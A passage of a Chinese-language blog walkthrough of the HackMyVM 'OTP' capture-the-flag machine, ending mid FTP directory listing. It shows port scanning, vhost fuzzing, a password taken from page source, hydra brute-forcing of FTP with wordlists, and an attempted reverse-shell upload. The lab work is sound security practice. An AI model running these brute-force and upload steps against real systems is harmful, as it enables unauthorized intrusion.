{"id":758,"date":"2024-07-12T18:18:45","date_gmt":"2024-07-12T10:18:45","guid":{"rendered":"http:\/\/162.14.82.114\/?p=758"},"modified":"2024-07-12T18:18:45","modified_gmt":"2024-07-12T10:18:45","slug":"hmv-_-otp","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/758\/07\/12\/2024\/","title":{"rendered":"hmv[-_-]otp"},"content":{"rendered":"<h1>OTP<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817518.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817518.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240710135623020\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817521.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817521.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240712150433355\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ rustscan -a $IP -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nPlease contribute more quotes to our GitHub https:\/\/github.com\/rustscan\/rustscan\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 192.168.0.107:21\nOpen 192.168.0.107:80\n\nPORT   STATE SERVICE REASON  VERSION\n21\/tcp open  ftp     syn-ack vsftpd 3.0.3\n80\/tcp open  http    syn-ack Apache httpd 2.4.51\n|_http-title: Did not follow redirect to http:\/\/otp.hmv\/\n|_http-server-header: Apache\/2.4.51 (Debian)\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\nService Info: Host: 127.0.1.1; OS: Unix<\/code><\/pre>\n<p>\u505a\u4e00\u4e2a\u57df\u540d\u89e3\u6790\uff1a<\/p>\n<pre><code class=\"language-text\">192.168.0.107   otp.hmv<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ gobuster dir -u http:\/\/otp.hmv -q -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,txt,html\n\/.php                 (Status: 403) [Size: 272]\n\/index.html           (Status: 200) [Size: 11202]\n\/.html                (Status: 403) [Size: 272]\n\/javascript           (Status: 301) [Size: 307] [--&gt; http:\/\/otp.hmv\/javascript\/]\n\/.php                 (Status: 403) [Size: 272]\n\/.html                (Status: 403) [Size: 272]\n\/server-status        (Status: 403) [Size: 272]<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817523.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817523.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" 
alt=\"image-20240712150845197\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u5c31\u662f\u4e00\u4e2a\u9ed8\u8ba4\u754c\u9762\uff0c\u6e90\u7801\u4e5f\u6ca1\u5565\u4e1c\u897f\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u5176\u4ed6\u7684\u76ee\u5f55\uff1a<\/p>\n<h3>fuzz\u76ee\u5f55<\/h3>\n<p>\u6ca1\u53d1\u73b0\u5565\u654f\u611f\u76ee\u5f55\uff0c\u5c1d\u8bd5\u8fdb\u884cfuzz\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ ffuf -u http:\/\/$IP -H &quot;Host: FUZZ.otp.hmv&quot; -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt --fw 3482\n\n        \/&#039;___\\  \/&#039;___\\           \/&#039;___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : GET\n :: URL              : http:\/\/192.168.0.107\n :: Wordlist         : FUZZ: \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt\n :: Header           : Host: FUZZ.otp.hmv\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter           : Response words: 3482\n________________________________________________\n\nargon                   [Status: 200, Size: 25537, Words: 9965, Lines: 627, Duration: 89ms]\n:: Progress: [19966\/19966] :: Job [1\/1] :: 365 req\/sec :: Duration: [0:00:58] :: Errors: 0 ::<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ ffuf -u http:\/\/$IP -H &quot;Host: otp.FUZZ.hmv&quot; -w 
\/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt --fw 20  \n\n        \/&#039;___\\  \/&#039;___\\           \/&#039;___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : GET\n :: URL              : http:\/\/192.168.0.107\n :: Wordlist         : FUZZ: \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt\n :: Header           : Host: otp.FUZZ.hmv\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter           : Response words: 20\n________________________________________________\n\notp                     [Status: 200, Size: 11202, Words: 3482, Lines: 373, Duration: 4ms]\n:: Progress: [19966\/19966] :: Job [1\/1] :: 5714 req\/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ ffuf -u http:\/\/$IP -H &quot;Host: otp.otp.FUZZ.hmv&quot; -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt --fw 20\n\n        \/&#039;___\\  \/&#039;___\\           \/&#039;___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : GET\n :: URL              : http:\/\/192.168.0.107\n :: Wordlist         
: FUZZ: \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt\n :: Header           : Host: otp.otp.FUZZ.hmv\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter           : Response words: 20\n________________________________________________\n\notp                     [Status: 200, Size: 11202, Words: 3482, Lines: 373, Duration: 2ms]\n:: Progress: [19966\/19966] :: Job [1\/1] :: 5882 req\/sec :: Duration: [0:00:05] :: Errors: 0 ::<\/code><\/pre>\n<p>\u4e0b\u9762\u8fd9\u4e2a\u4f3c\u4e4e\u4e0d\u592a\u9760\u8c31\uff0c\u5c1d\u8bd5\u4e00\u4e0b\u4e0a\u9762\u90a3\u4e2a\uff1a<\/p>\n<pre><code class=\"language-text\">192.168.0.107   argon.otp.hmv<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8bbf\u95ee\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817524.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817524.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240712152507274\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817525.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817525.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240712152540843\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h3>\u6e90\u4ee3\u7801\u6cc4\u9732<\/h3>\n<p>\u627e\u5230\u767b\u5f55\u754c\u9762\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u6e90\u4ee3\u7801\uff0c\u53d1\u73b0\u7248\u672c\uff1a<\/p>\n<pre><code class=\"language-bash\">view-source:http:\/\/argon.otp.hmv\/login.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817526.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817526.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240712152623803\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u627e\u5230token:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817527.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817527.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240712152708101\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u67e5\u770b\u4e00\u4e0b\u5176\u4ed6\u754c\u9762\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817528.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817528.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240712153401732\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u8d26\u53f7\u5bc6\u7801\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u6e90\u4ee3\u7801\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817529.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817529.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240712153515874\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5f97\u5230\u4e00\u7ec4\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-text\">otpuser\n#4ck!ng!s!nMybl0od<\/code><\/pre>\n<p>\u767b\u5f55\u4e0a\u53bb\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817530.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817530.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240712153901457\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53ea\u6709\u8fd9\u53e5\u8bdd\uff0c\u6e90\u4ee3\u7801\u4e5f\u6ca1\u4e1c\u897f\u3002<\/p>\n<h3>\u7206\u7834ftp<\/h3>\n<p>ftp\u5c1d\u8bd5\u9ed8\u8ba4\u767b\u5f55\u65b9\u5f0f\u65e0\u6cd5\u8fdb\u884c\u767b\u5f55\uff0c\u5c1d\u8bd5\u8fd9\u4e2a\u7528\u6237\u540d\u8fdb\u884c\u7206\u7834\uff0c\u540c\u65f6\u5c1d\u8bd5\u4e86\u4e0a\u9762\u90a3\u4e2a\u8d26\u53f7\u5bc6\u7801\u65e0\u6cd5\u767b\u5f55\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ hydra -l david -P \/usr\/share\/wordlists\/rockyou.txt ftp:\/\/$IP 2&gt;\/dev\/null\nHydra v9.5 (c) 2023 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret 
service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-07-12 03:42:52\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1\/p:14344399), ~896525 tries per task\n[DATA] attacking ftp:\/\/192.168.0.107:21\/\n[STATUS] 258.00 tries\/min, 258 tries in 00:01h, 14344141 to do in 926:38h, 16 active\n[STATUS] 259.67 tries\/min, 779 tries in 00:03h, 14343620 to do in 920:39h, 16 active\n[STATUS] 268.86 tries\/min, 1882 tries in 00:07h, 14342517 to do in 889:07h, 16 active\n^C^C^Z\nzsh: suspended  hydra -l david -P \/usr\/share\/wordlists\/rockyou.txt ftp:\/\/$IP 2&gt; \/dev\/null<\/code><\/pre>\n<p>\u6ca1\u7206\u7834\u51fa\u6765\uff0c\u5c1d\u8bd5\u7528\u793e\u5de5\u5b57\u5178\u8fdb\u884c\u7206\u7834\uff1a<a href=\"https:\/\/www.ddosi.org\/pass8\/\">https:\/\/www.ddosi.org\/pass8\/<\/a><\/p>\n<p>\u5c1d\u8bd5\u7206\u7834\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ hydra -l david -P pass ftp:\/\/$IP 2&gt;\/dev\/null\nHydra v9.5 (c) 2023 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-07-12 04:18:03\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 14650 login tries (l:1\/p:14650), ~916 tries per task\n[DATA] attacking ftp:\/\/192.168.0.107:21\/\n[21][ftp] host: 192.168.0.107   login: david   password: DAVID\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-07-12 04:18:17<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u8bbf\u95ee\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ ftp 
$IP\nConnected to 192.168.0.107.\n220 (vsFTPd 3.0.3)\nName (192.168.0.107:kali): david\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; ls -la\n229 Entering Extended Passive Mode (|||60936|)\n150 Here comes the directory listing.\ndrwxr-xrwx    2 0        115          4096 Nov 22  2021 .\ndrwxr-xr-x    3 0        0            4096 Nov 19  2021 ..\n-rw-r--r--    1 1001     1001          125 Nov 19  2021 important_note.txt\n226 Directory send OK.\nftp&gt; get important_note.txt\nlocal: important_note.txt remote: important_note.txt\n229 Entering Extended Passive Mode (|||64865|)\n150 Opening BINARY mode data connection for important_note.txt (125 bytes).\n100% |***************************************************************************************************************************************|   125        6.29 KiB\/s    00:00 ETA\n226 Transfer complete.\n125 bytes received in 00:00 (5.57 KiB\/s)\nftp&gt; cd ..\n250 Directory successfully changed.\nftp&gt; ls -la\n229 Entering Extended Passive Mode (|||57148|)\n150 Here comes the directory listing.\ndrwxr-xr-x    3 0        0            4096 Nov 19  2021 .\ndrwxr-xr-x   18 0        0            4096 Nov 17  2021 ..\ndrwxr-xrwx    2 0        115          4096 Nov 22  2021 ftp\n226 Directory send OK.\nftp&gt; cd ..\n250 Directory successfully changed.\nftp&gt; ls -la\n229 Entering Extended Passive Mode (|||18938|)\n150 Here comes the directory listing.\ndrwxr-xr-x   18 0        0            4096 Nov 17  2021 .\ndrwxr-xr-x   18 0        0            4096 Nov 17  2021 ..\nlrwxrwxrwx    1 0        0               7 Nov 17  2021 bin -&gt; usr\/bin\ndrwxr-xr-x    3 0        0            4096 Nov 17  2021 boot\ndrwxr-xr-x   17 0        0            3140 Jul 12 03:03 dev\ndrwxr-xr-x   74 0        0            4096 Jul 12 03:03 etc\ndrwxr-xr-x    3 0        0            4096 Nov 17  2021 home\nlrwxrwxrwx    1 0        0             
 30 Nov 17  2021 initrd.img -&gt; boot\/initrd.img-5.10.0-9-amd64\nlrwxrwxrwx    1 0        0              30 Nov 17  2021 initrd.img.old -&gt; boot\/initrd.img-5.10.0-9-amd64\nlrwxrwxrwx    1 0        0               7 Nov 17  2021 lib -&gt; usr\/lib\nlrwxrwxrwx    1 0        0               9 Nov 17  2021 lib32 -&gt; usr\/lib32\nlrwxrwxrwx    1 0        0               9 Nov 17  2021 lib64 -&gt; usr\/lib64\nlrwxrwxrwx    1 0        0              10 Nov 17  2021 libx32 -&gt; usr\/libx32\ndrwx------    2 0        0           16384 Nov 17  2021 lost+found\ndrwxr-xr-x    3 0        0            4096 Nov 17  2021 media\ndrwxr-xr-x    2 0        0            4096 Nov 17  2021 mnt\ndrwxr-xr-x    2 0        0            4096 Nov 23  2021 opt\ndr-xr-xr-x  167 0        0               0 Jul 12 03:03 proc\ndrwx------    2 0        0            4096 Nov 23  2021 root\ndrwxr-xr-x   20 0        0             540 Jul 12 03:03 run\nlrwxrwxrwx    1 0        0               8 Nov 17  2021 sbin -&gt; usr\/sbin\ndrwxr-xr-x    3 0        0            4096 Nov 19  2021 srv\ndr-xr-xr-x   13 0        0               0 Jul 12 03:03 sys\ndrwxrwxrwt   10 0        0            4096 Jul 12 04:09 tmp\ndrwxr-xr-x   14 0        0            4096 Nov 17  2021 usr\ndrwxr-xr-x   12 0        0            4096 Nov 17  2021 var\nlrwxrwxrwx    1 0        0              27 Nov 17  2021 vmlinuz -&gt; boot\/vmlinuz-5.10.0-9-amd64\nlrwxrwxrwx    1 0        0              27 Nov 17  2021 vmlinuz.old -&gt; boot\/vmlinuz-5.10.0-9-amd64\n226 Directory send OK.\nftp&gt; cd \/var\/www\/html\n250 Directory successfully changed.\nftp&gt; ls -la\n229 Entering Extended Passive Mode (|||27952|)\n150 Here comes the directory listing.\ndrwxr-xr-x    2 0        0            4096 Nov 23  2021 .\ndrwxr-xr-x    4 0        0            4096 Nov 22  2021 ..\n-rw-r--r--    1 0        0             114 Nov 21  2021 .htaccess\n-rw-r--r--    1 0        0           11202 Nov 19  2021 index.html\n226 Directory send OK.\nftp&gt; 
put revshell.php \nlocal: revshell.php remote: revshell.php\n229 Entering Extended Passive Mode (|||20123|)\n553 Could not create file.\nftp&gt; cd ..\n250 Directory successfully changed.\nftp&gt; ls -la\n229 Entering Extended Passive Mode (|||38300|)\n150 Here comes the directory listing.\ndrwxr-xr-x    4 0        0            4096 Nov 22  2021 .\ndrwxr-xr-x   12 0        0            4096 Nov 17  2021 ..\ndrwxr-xr-x    2 0        0            4096 Nov 23  2021 html\ndrwxr-xr-x    4 0        0            4096 Nov 19  2021 otp\n226 Directory send OK.\nftp&gt; cd otp\n250 Directory successfully changed.\nftp&gt; ls -la\n229 Entering Extended Passive Mode (|||38040|)\n150 Here comes the directory listing.\ndrwxr-xr-x    4 0        0            4096 Nov 19  2021 .\ndrwxr-xr-x    4 0        0            4096 Nov 22  2021 ..\ndrwxr-xr-x    5 0        0            4096 Nov 23  2021 argon\ndrwxr-x--x    2 0        0            4096 Nov 23  2021 totp\n226 Directory send OK.\nftp&gt; cd argon\n250 Directory successfully changed.\nftp&gt; ls -la\n229 Entering Extended Passive Mode (|||38922|)\n150 Here comes the directory listing.\ndrwxr-xr-x    5 0        0            4096 Nov 23  2021 .\ndrwxr-xr-x    4 0        0            4096 Nov 19  2021 ..\n-rw-r--r--    1 0        0              10 Feb 05  2020 .gitignore\n-rw-r--r--    1 0        0             404 Feb 05  2020 CHANGELOG.md\n-rw-r--r--    1 0        0             384 Feb 05  2020 ISSUE_TEMPLATE.md\n-rw-r--r--    1 0        0            1101 Feb 05  2020 LICENSE.md\n-rw-r--r--    1 0        0           12363 Feb 05  2020 README.md\ndrwxr-xr-x    8 0        0            4096 Feb 05  2020 assets\n-rw-r--r--    1 0        0             221 Nov 22  2021 cr3d5_123.html\ndrwxr-xr-x    2 0        0            4096 Feb 05  2020 docs\n-rw-r--r--    1 0        0             856 Feb 05  2020 gulpfile.js\n-rw-r--r--    1 0        0           25537 Nov 22  2021 index.html\n-rw-r--r--    1 0        0            7554 Nov 22  2021 
